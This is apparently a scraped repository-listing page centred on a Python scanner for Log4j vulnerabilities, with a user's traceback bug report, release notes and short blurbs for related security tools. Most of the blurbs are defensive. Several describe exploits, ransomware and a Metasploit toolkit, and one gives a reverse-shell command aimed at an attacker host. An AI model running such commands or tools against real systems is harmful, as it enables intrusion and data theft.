Scanning for CVE-2021-44228, CVE-2021-45046, CVE-2019-17571
Requires a minimum of Python 2.7. Can be executed as Custom Script Rule of an Audit or via a Server Script with Server Automation. Also executable standalone from the command line if an Agent is present.
Reference
log4j-nullroute Quick script to ingest IP feed from greynoise.io for log4j (CVE-2021-44228) and null route bad addresses. Works w/Cisco IOS-XE and Ari
Log4j-CVE-2021-44228 Mass Check Vulnerable Log4j CVE-2021-44228 Introduction Actually I just checked via Vulnerable Application from https://github.co
log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description This demo Tomcat 8 server has a vulnerable app deployed on it and is also vulne
log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script
log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk
log4j-honeypot-flask Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228 This can be
Log4jTools Tools for investigating Log4j CVE-2021-44228 FetchPayload.py (Get java payload from ldap path provided in JNDI lookup). Example command: Re
Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At
We are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them
Windows 11 python -m pip install pywin32 Python 3.10.1
Thanks, first, for offering this script.
Get the following error when running your script.
5 Sep 12, 2022
6 Dec 28, 2022
60 Dec 10, 2022
1 Dec 15, 2021
431 Dec 22, 2022
144 Nov 19, 2022
91 Dec 29, 2022
16 Mar 24, 2022
13 Jan 4, 2022
c:\dev\github\log4j_scanner>python scanner_win.py
Indicator for vulnerable component found in C:\$RECYCLE.BIN\S-1-5-21-67875770-1077041941-3688728843-1001\$RTYFQH1.jar: log4j 2.9.1-2.10.0
Unhandled exception processing C:\Program Files\Cryptomator\app\mods\javafx-graphics-17.0.1-win.jar
Traceback (most recent call last):
File "c:\dev\github\log4j_scanner\scanner_win.py", line 88, in main
if handleJar(filename, filename):
File "c:\dev\github\log4j_scanner\scanner_win.py", line 72, in handleJar
return handleJar(io.BytesIO(z.read(name)), filename.decode('utf-8')+":"+name)
AttributeError: 'str' object has no attribute 'decode'. Did you mean: 'encode'?
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "c:\dev\github\log4j_scanner\scanner_win.py", line 96, in <module>
sys.exit(main())
File "c:\dev\github\log4j_scanner\scanner_win.py", line 92, in main
traceback.print_exc()
NameError: name 'traceback' is not defined
Any idea why this is causing an issue.
bugAdded checksums for CVE-2021-44832
Source code(tar.gz)Python 3 compatible Use all but 2 CPUs for digest computations.
Source code(tar.gz)Some windows boxes throw an exception calling cpu_count()
Source code(tar.gz)Every project has to have an initial stable release
Source code(tar.gz)A malware to encrypt all the .txt and .jpg files in target computer using RSA algorithms. Change the Blackgound image of targets' computer. and decrypt the targets' encrypted files in our own compute
FBGen is simple facebook user based wordlist generator using Username/ID and cookie.
bootleg-productions consider this account to be a journal for me to record my progress throughout my python journey feel free to copy codes from this
大宝剑-信息收集和资产梳理工具(红队、蓝队、企业组织架构、子域名、Web资产梳理、Web指纹识别、ICON_Hash资产匹配)
Log4jake Log4jake works by spidering a web application for GET/POST requests. It will then automatically execute the GET/POST requests, filling any di
f5-waf-enforce-sigs-CVE-2021-44228 This enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device Overview This script enforce
MSF-EXPLOIT MSF-ANDRO is a Metasploit Multi Purpose Exploiting Toolkit For Termux . Only a Basic Script , Still in Development . FEATURES : Install Me
A compact version of EDI-Vetter, which uses the TLS output to quickly vet transit signals. All your favorite hits in a simplified format.
Python Library For Ethical Hacker
The Linux tool to automate the process of getting a pty once you got admin credentials in a Wordpress site. Keep in mind that right now Omega only can attack Linux hosts.
RedlineSpam Python tool to spam Redline Infostealer panels with legit looking da
IronNet Threat Research 🕵️ Overview This repository contains IronNet's Threat Research. Research & Reporting 📝 Project Description Cobalt Strike Res
EVM Bytecode Disassembler The disassembler parses evm bytecode from the command line or from a file. It does not matter whether the bytecode is prefix
Python sandbox runners for executing code in isolation aka snekbox.
🦑 dirbruter Simples brute forcer de diretorios para web pentest. ❕ Atenção Não ataque sites privados. Isto é illegal. 🖥️ Pré-requisitos Ultima versã
Malware Arcane Repository of notes and scripts I use when doing malware analysis
Grafana-LFI-8.x Exploit grafana Pre-Auth LFI How to use python3
CVE-2021-40346-POC CVE-2021-40346 integer overflow enables http smuggling Reference: https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021
F-ck-the-system A python script written for lazy people to hack their school systen ;D Python voice notes writer This is a python script to record you
BOF-Roaster is an automated buffer overflow exploit machine which is begin written with Python 3. On first release it was able to successfully break many of the most well-known buffer overflow exampl
2 Dec 02, 2022
2 Jul 20, 2022
1 Dec 30, 2021
835 Jan 05, 2023
16 May 09, 2022
5 Mar 31, 2022
22 Dec 29, 2022
2 Aug 03, 2022
11 Nov 03, 2022
12 Nov 09, 2022
4 Jan 27, 2022
36 Dec 02, 2022
22 Dec 27, 2022
164 Dec 20, 2022
6 Jan 22, 2022
9 Jun 01, 2022
2 Jul 25, 2022
34 Nov 15, 2022
2 Jan 09, 2022
5 Nov 23, 2021